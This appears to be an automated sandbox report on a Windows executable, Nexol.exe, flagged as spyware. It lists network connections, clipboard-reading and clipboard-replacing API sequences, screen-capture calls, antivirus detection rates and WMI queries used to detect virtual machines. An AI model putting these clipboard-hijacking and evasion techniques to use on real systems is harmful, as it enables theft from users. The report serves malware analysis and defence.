Source: unknown	HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.210.122.61:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.210.122.61:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49741 version: TLS 1.2

Source: C:\Users\user\Desktop\Nexol.exe

Code function: 6_2_0043FB10 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,

6_2_0043FB10

Source: C:\Users\user\Desktop\Nexol.exe

Code function: 6_2_03B41000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,

6_2_03B41000

Source: C:\Users\user\Desktop\Nexol.exe

Code function: 6_2_0043FB10 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,

6_2_0043FB10

Source: C:\Users\user\Desktop\Nexol.exe

Code function: 6_2_0043FD60 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,

6_2_0043FD60

Source: C:\Users\user\Desktop\Nexol.exe	Code function: 5_2_026B2548	5_2_026B2548
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_0040F840	6_2_0040F840
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_00444870	6_2_00444870
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_0041203E	6_2_0041203E
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_004150E6	6_2_004150E6
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_0044E0F0	6_2_0044E0F0
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_0041A150	6_2_0041A150
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_0044D950	6_2_0044D950
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_00437177	6_2_00437177
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_00420910	6_2_00420910
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_0042C300	6_2_0042C300
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_00410B20	6_2_00410B20
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_00416B20	6_2_00416B20
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_0040E403	6_2_0040E403
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_004444E0	6_2_004444E0
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_0041148E	6_2_0041148E
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_00428550	6_2_00428550
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_0044CD60	6_2_0044CD60
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_0041AF28	6_2_0041AF28
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_0042FFF0	6_2_0042FFF0
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_00401040	6_2_00401040
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_0042D060	6_2_0042D060
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_0042F812	6_2_0042F812
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_0044C020	6_2_0044C020
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_0044C039	6_2_0044C039
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_0044C03B	6_2_0044C03B
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_004368D3	6_2_004368D3
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_004460F0	6_2_004460F0
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_00438894	6_2_00438894
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_0044C1C0	6_2_0044C1C0
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_004319CC	6_2_004319CC
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_0040A1F0	6_2_0040A1F0
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_00445990	6_2_00445990
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_004489A0	6_2_004489A0
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_0041D1A8	6_2_0041D1A8
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_0043C9B7	6_2_0043C9B7
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_004381B5	6_2_004381B5
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_0044D240	6_2_0044D240
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_00433260	6_2_00433260
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_0044CA70	6_2_0044CA70
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_00408A20	6_2_00408A20
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_00441A31	6_2_00441A31
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_0042E2C0	6_2_0042E2C0
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_00449ACD	6_2_00449ACD
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_00402AD0	6_2_00402AD0
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_0044C2F0	6_2_0044C2F0
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_00424290	6_2_00424290
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_00423AB0	6_2_00423AB0
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_00452AB7	6_2_00452AB7
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_0040C350	6_2_0040C350
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_0043C305	6_2_0043C305
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_0043FB10	6_2_0043FB10
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_00420316	6_2_00420316
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_00432318	6_2_00432318
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_0040CB30	6_2_0040CB30
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_004293D0	6_2_004293D0
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_0040B3F0	6_2_0040B3F0
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_0040ABF0	6_2_0040ABF0
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_00431393	6_2_00431393
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_0041E440	6_2_0041E440
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_0042F47A	6_2_0042F47A
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_0041EC78	6_2_0041EC78
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_00409410	6_2_00409410
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_004334DB	6_2_004334DB
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_004034E0	6_2_004034E0
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_004244F0	6_2_004244F0
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_00448CF0	6_2_00448CF0
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_00443C90	6_2_00443C90
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_00436CAC	6_2_00436CAC
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_0043F540	6_2_0043F540
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_0041DD63	6_2_0041DD63
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_00446579	6_2_00446579
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_0044157A	6_2_0044157A
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_00407D20	6_2_00407D20
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_00415D3B	6_2_00415D3B
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_0044D580	6_2_0044D580
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_0042CDA0	6_2_0042CDA0
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_00437644	6_2_00437644
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_0041FE50	6_2_0041FE50
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_0043E605	6_2_0043E605
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_00428E10	6_2_00428E10
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_00445620	6_2_00445620
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_00432630	6_2_00432630
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_00446E31	6_2_00446E31
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_004306CB	6_2_004306CB
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_00443EF0	6_2_00443EF0
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_00403E80	6_2_00403E80
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_00423E80	6_2_00423E80
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_00408E90	6_2_00408E90
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_004426AB	6_2_004426AB
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_00410F43	6_2_00410F43
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_0041CF45	6_2_0041CF45
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_00404762	6_2_00404762
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_0044BF20	6_2_0044BF20
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_00427730	6_2_00427730
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_0043AF37	6_2_0043AF37
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_00430FC4	6_2_00430FC4
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_0041AF28	6_2_0041AF28
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_00424780	6_2_00424780
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_0043CF80	6_2_0043CF80
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_00442F8F	6_2_00442F8F
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_0042EFA0	6_2_0042EFA0
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_0043EFAB	6_2_0043EFAB

Source: C:\Users\user\Desktop\Nexol.exe	Code function: String function: 0040B1E0 appears 53 times
Source: C:\Users\user\Desktop\Nexol.exe	Code function: String function: 0041A140 appears 115 times

Source: C:\Users\user\Desktop\Nexol.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7528 -s 800

Source: Nexol.exe, 00000005.00000002.1378990712.00000000038D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePortals.exe0 vs Nexol.exe
Source: Nexol.exe, 00000005.00000002.1376812425.0000000000B4E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Nexol.exe
Source: Nexol.exe, 00000005.00000000.1276392248.0000000000516000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: OriginalFilenamePortals.exe0 vs Nexol.exe
Source: Nexol.exe, 00000006.00000002.2543893852.000000000146C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePortals.exe0 vs Nexol.exe
Source: Nexol.exe	Binary or memory string: OriginalFilenamePortals.exe0 vs Nexol.exe

Source: Nexol.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Nexol.exe

Static PE information: Section: .CSS ZLIB complexity 1.0003337967867232

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/6@15/4

Source: C:\Users\user\Desktop\Nexol.exe

Code function: 6_2_00444870 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

6_2_00444870

Source: C:\Users\user\Desktop\Nexol.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7528

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\3e9d29a8-97fe-4f91-8ad0-adc906ead8fd

Jump to behavior

Source: Nexol.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Nexol.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\Nexol.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Nexol.exe	ReversingLabs: Detection: 89%
Source: Nexol.exe	Virustotal: Detection: 76%

Source: C:\Users\user\Desktop\Nexol.exe

File read: C:\Users\user\Desktop\Nexol.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Nexol.exe "C:\Users\user\Desktop\Nexol.exe"
Source: C:\Users\user\Desktop\Nexol.exe	Process created: C:\Users\user\Desktop\Nexol.exe "C:\Users\user\Desktop\Nexol.exe"
Source: C:\Users\user\Desktop\Nexol.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7528 -s 800
Source: C:\Users\user\Desktop\Nexol.exe	Process created: C:\Users\user\Desktop\Nexol.exe "C:\Users\user\Desktop\Nexol.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Nexol.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: Nexol.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Nexol.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: Nexol.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\Users\Hand1\source\repos\Portals\Portals\obj\Release\Portals.pdb source: Nexol.exe
Source:	Binary string: System.Windows.Forms.pdb source: WER295A.tmp.dmp.9.dr
Source:	Binary string: Portals.pdb source: WER295A.tmp.dmp.9.dr
Source:	Binary string: mscorlib.pdb source: WER295A.tmp.dmp.9.dr
Source:	Binary string: System.ni.pdbRSDS source: WER295A.tmp.dmp.9.dr
Source:	Binary string: System.pdb@\ source: WER295A.tmp.dmp.9.dr
Source:	Binary string: mscorlib.ni.pdb source: WER295A.tmp.dmp.9.dr
Source:	Binary string: C:\Users\Hand1\source\repos\Portals\Portals\obj\Release\Portals.pdb<;V; H;_CorExeMainmscoree.dll source: Nexol.exe
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER295A.tmp.dmp.9.dr
Source:	Binary string: System.ni.pdb source: WER295A.tmp.dmp.9.dr
Source:	Binary string: System.pdb source: WER295A.tmp.dmp.9.dr

Source: Nexol.exe

Static PE information: 0xADFF511F [Mon Jul 3 22:20:15 2062 UTC]

Source: Nexol.exe

Static PE information: section name: .CSS

Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_00453074 push eax; ret	6_2_00453075
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_00453078 push edx; ret	6_2_00453079
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_004530A8 push eax; ret	6_2_004530A9
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_004552D2 push 00000000h; ret	6_2_00455374
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_0045346C push eax; ret	6_2_0045346D
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_00453468 push eax; ret	6_2_00453469
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_00453474 push edx; ret	6_2_00453475
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_00453470 push eax; ret	6_2_00453471
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_00454ED1 push 00000000h; ret	6_2_00454EE0

Source: C:\Users\user\Desktop\Nexol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\Nexol.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

